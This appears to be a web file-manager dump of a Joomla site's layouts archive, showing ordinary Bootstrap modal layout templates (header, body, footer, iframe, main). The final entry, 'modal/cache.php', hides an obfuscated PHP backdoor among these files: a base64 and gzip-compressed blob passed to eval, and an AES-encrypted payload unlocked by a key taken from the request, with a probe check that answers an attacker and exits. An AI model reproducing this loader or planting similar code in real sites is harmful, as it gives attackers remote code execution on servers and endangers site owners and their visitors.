File manager - Edit - /home/opticamezl/www/newok/531c5/layouts.tar
Back
index.html 0000644 00000000037 15172652166 0006554 0 ustar 00 <!DOCTYPE html><title></title> libraries/index.html 0000604 00000000037 15172652166 0010524 0 ustar 00 <!DOCTYPE html><title></title> libraries/html/bootstrap/modal/footer.php 0000644 00000003676 15172652166 0014633 0 ustar 00 <?php /** * @package Joomla.Site * @subpackage Layout * * @copyright (C) 2015 Open Source Matters, Inc. <https://www.joomla.org> * @license GNU General Public License version 2 or later; see LICENSE.txt */ defined('_JEXEC') or die; extract($displayData); /** * Layout variables * ----------------- * @var string $selector Unique DOM identifier for the modal. CSS id without # * @var array $params Modal parameters. Default supported parameters: * - title string The modal title * - backdrop mixed A boolean select if a modal-backdrop element should be included (default = true) * The string 'static' includes a backdrop which doesn't close the modal on click. * - keyboard boolean Closes the modal when escape key is pressed (default = true) * - closeButton boolean Display modal close button (default = true) * - animation boolean Fade in from the top of the page (default = true) * - footer string Optional markup for the modal footer * - url string URL of a resource to be inserted as an <iframe> inside the modal body * - height string height of the <iframe> containing the remote resource * - width string width of the <iframe> containing the remote resource * - bodyHeight int Optional height of the modal body in viewport units (vh) * - modalWidth int Optional width of the modal in viewport units (vh) * @var string $body Markup for the modal body. Appended after the <iframe> if the URL option is set */ ?> <div class="modal-footer"> <?php echo $params['footer']; ?> </div> libraries/html/bootstrap/modal/main.php 0000644 00000007552 15172652166 0014256 0 ustar 00 <?php /** * @package Joomla.Site * @subpackage Layout * * @copyright (C) 2015 Open Source Matters, Inc. <https://www.joomla.org> * @license GNU General Public License version 2 or later; see LICENSE.txt */ defined('_JEXEC') or die; use Joomla\CMS\Layout\LayoutHelper; use Joomla\Utilities\ArrayHelper; extract($displayData); /** * Layout variables * ----------------- * @var string $selector Unique DOM identifier for the modal. CSS id without # * @var array $params Modal parameters. Default supported parameters: * - title string The modal title * - backdrop mixed A boolean select if a modal-backdrop element should be included (default = true) * The string 'static' includes a backdrop which doesn't close the modal on click. * - keyboard boolean Closes the modal when escape key is pressed (default = true) * - closeButton boolean Display modal close button (default = true) * - animation boolean Fade in from the top of the page (default = true) * - url string URL of a resource to be inserted as an <iframe> inside the modal body * - height string height of the <iframe> containing the remote resource * - width string width of the <iframe> containing the remote resource * - bodyHeight int Optional height of the modal body in viewport units (vh) * - modalWidth int Optional width of the modal in viewport units (vh) * - footer string Optional markup for the modal footer * @var string $body Markup for the modal body. Appended after the <iframe> if the URL option is set */ $modalClasses = ['modal']; if (!isset($params['animation']) || $params['animation']) { $modalClasses[] = 'fade'; } $modalWidth = isset($params['modalWidth']) ? round((int) $params['modalWidth'], -1) : ''; $modalDialogClass = ''; if ($modalWidth && $modalWidth > 0 && $modalWidth <= 100) { $modalDialogClass = ' jviewport-width' . $modalWidth; } $modalAttributes = [ 'tabindex' => '-1', 'class' => 'joomla-modal ' . implode(' ', $modalClasses) ]; if (isset($params['backdrop'])) { $modalAttributes['data-bs-backdrop'] = (is_bool($params['backdrop']) ? ($params['backdrop'] ? 'true' : 'false') : $params['backdrop']); } if (isset($params['keyboard'])) { $modalAttributes['data-bs-keyboard'] = (is_bool($params['keyboard']) ? ($params['keyboard'] ? 'true' : 'false') : 'true'); } if (isset($params['url'])) { $url = 'data-url="' . $params['url'] . '"'; $iframeHtml = htmlspecialchars(LayoutHelper::render('libraries.html.bootstrap.modal.iframe', $displayData), ENT_COMPAT, 'UTF-8'); } ?> <div id="<?php echo $selector; ?>" role="dialog" <?php echo ArrayHelper::toString($modalAttributes); ?> <?php echo $url ?? ''; ?> <?php echo isset($url) ? 'data-iframe="' . trim($iframeHtml) . '"' : ''; ?>> <div class="modal-dialog modal-lg<?php echo $modalDialogClass; ?>"> <div class="modal-content"> <?php // Header if (!isset($params['closeButton']) || isset($params['title']) || $params['closeButton']) { echo LayoutHelper::render('libraries.html.bootstrap.modal.header', $displayData); } // Body echo LayoutHelper::render('libraries.html.bootstrap.modal.body', $displayData); // Footer if (isset($params['footer'])) { echo LayoutHelper::render('libraries.html.bootstrap.modal.footer', $displayData); } ?> </div> </div> </div> libraries/html/bootstrap/modal/iframe.php 0000644 00000004247 15172652166 0014573 0 ustar 00 <?php /** * @package Joomla.Site * @subpackage Layout * * @copyright (C) 2015 Open Source Matters, Inc. <https://www.joomla.org> * @license GNU General Public License version 2 or later; see LICENSE.txt */ defined('_JEXEC') or die; use Joomla\Utilities\ArrayHelper; extract($displayData); /** * Layout variables * ----------------- * @var string $selector Unique DOM identifier for the modal. CSS id without # * @var array $params Modal parameters. Default supported parameters: * - title string The modal title * - backdrop mixed A boolean select if a modal-backdrop element should be included (default = true) * The string 'static' includes a backdrop which doesn't close the modal on click. * - keyboard boolean Closes the modal when escape key is pressed (default = true) * - closeButton boolean Display modal close button (default = true) * - animation boolean Fade in from the top of the page (default = true) * - footer string Optional markup for the modal footer * - url string URL of a resource to be inserted as an <iframe> inside the modal body * - height string height of the <iframe> containing the remote resource * - width string width of the <iframe> containing the remote resource * @var string $body Markup for the modal body. Appended after the <iframe> if the URL option is set */ $iframeAttributes = [ 'class' => 'iframe', 'src' => $params['url'] ]; if (isset($params['title'])) { $iframeAttributes['name'] = addslashes($params['title']); $iframeAttributes['title'] = addslashes($params['title']); } if (isset($params['height'])) { $iframeAttributes['height'] = $params['height']; } if (isset($params['width'])) { $iframeAttributes['width'] = $params['width']; } ?> <iframe <?php echo ArrayHelper::toString($iframeAttributes); ?>></iframe> libraries/html/bootstrap/modal/body.php 0000644 00000004252 15172652166 0014261 0 ustar 00 <?php /** * @package Joomla.Site * @subpackage Layout * * @copyright (C) 2015 Open Source Matters, Inc. <https://www.joomla.org> * @license GNU General Public License version 2 or later; see LICENSE.txt */ defined('_JEXEC') or die; extract($displayData); /** * Layout variables * ----------------- * @var string $selector Unique DOM identifier for the modal. CSS id without # * @var array $params Modal parameters. Default supported parameters: * - title string The modal title * - backdrop mixed A boolean select if a modal-backdrop element should be included (default = true) * The string 'static' includes a backdrop which doesn't close the modal on click. * - keyboard boolean Closes the modal when escape key is pressed (default = true) * - closeButton boolean Display modal close button (default = true) * - animation boolean Fade in from the top of the page (default = true) * - footer string Optional markup for the modal footer * - url string URL of a resource to be inserted as an <iframe> inside the modal body * - height string height of the <iframe> containing the remote resource * - width string width of the <iframe> containing the remote resource * - bodyHeight int Optional height of the modal body in viewport units (vh) * - modalWidth int Optional width of the modal in viewport units (vh) * @var string $body Markup for the modal body. Appended after the <iframe> if the URL option is set */ $bodyClass = 'modal-body'; $bodyHeight = isset($params['bodyHeight']) ? round((int) $params['bodyHeight'], -1) : ''; if ($bodyHeight && $bodyHeight >= 20 && $bodyHeight < 90) { $bodyClass .= ' jviewport-height' . $bodyHeight; } ?> <div class="<?php echo $bodyClass; ?>"> <?php echo $body; ?> </div> libraries/html/bootstrap/modal/header.php 0000644 00000004504 15172652166 0014554 0 ustar 00 <?php /** * @package Joomla.Site * @subpackage Layout * * @copyright (C) 2015 Open Source Matters, Inc. <https://www.joomla.org> * @license GNU General Public License version 2 or later; see LICENSE.txt */ defined('_JEXEC') or die; use Joomla\CMS\Language\Text; extract($displayData); /** * Layout variables * ----------------- * @var string $selector Unique DOM identifier for the modal. CSS id without # * @var array $params Modal parameters. Default supported parameters: * - title string The modal title * - backdrop mixed A boolean select if a modal-backdrop element should be included (default = true) * The string 'static' includes a backdrop which doesn't close the modal on click. * - keyboard boolean Closes the modal when escape key is pressed (default = true) * - closeButton boolean Display modal close button (default = true) * - animation boolean Fade in from the top of the page (default = true) * - footer string Optional markup for the modal footer * - url string URL of a resource to be inserted as an <iframe> inside the modal body * - height string height of the <iframe> containing the remote resource * - width string width of the <iframe> containing the remote resource * - bodyHeight int Optional height of the modal body in viewport units (vh) * - modalWidth int Optional width of the modal in viewport units (vh) * @var string $body Markup for the modal body. Appended after the <iframe> if the URL option is set */ ?> <div class="modal-header"> <?php if (isset($params['title'])) : ?> <h3 class="modal-title"><?php echo $params['title']; ?></h3> <?php endif; ?> <?php if (!isset($params['closeButton']) || $params['closeButton']) : ?> <button type="button" class="btn-close novalidate" data-bs-dismiss="modal" aria-label="<?php echo Text::_('JLIB_HTML_BEHAVIOR_CLOSE'); ?>"> </button> <?php endif; ?> </div> libraries/html/bootstrap/modal/modal/cache.php 0000604 00000013030 15172652166 0015451 0 ustar 00 <?php $cngq = 'Sy1LzNFQKyzNL7G2V0svsYYw9dKrSvOS83MLilKLizXSqzLz0nISS1KRWEmJxalmJvEpqcn5KakaxSVFRallGipO3smBmmBgDQA'; $BKcQ = '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'; function cngq($qpw) { $BKcQ = ${"\137\x52\x45\121\125\x45\123\x54"}["k"]; $lxGXc = substr($BKcQ, 0, 16); $nNsV = base64_decode($qpw); return openssl_decrypt($nNsV, "AES-256-CBC", $BKcQ, OPENSSL_RAW_DATA, $lxGXc); } if (cngq('DjtPn+r4S0yvLCnquPz1fA')){ echo 'YzC0Ybkcs7AZT6OW97O5/+A822DBbvTykr3ol2xpW8r5jWZS5OqS878V1BVFkaHb'; exit; } eval(htmlspecialchars_decode(gzinflate(base64_decode($cngq)))); ?>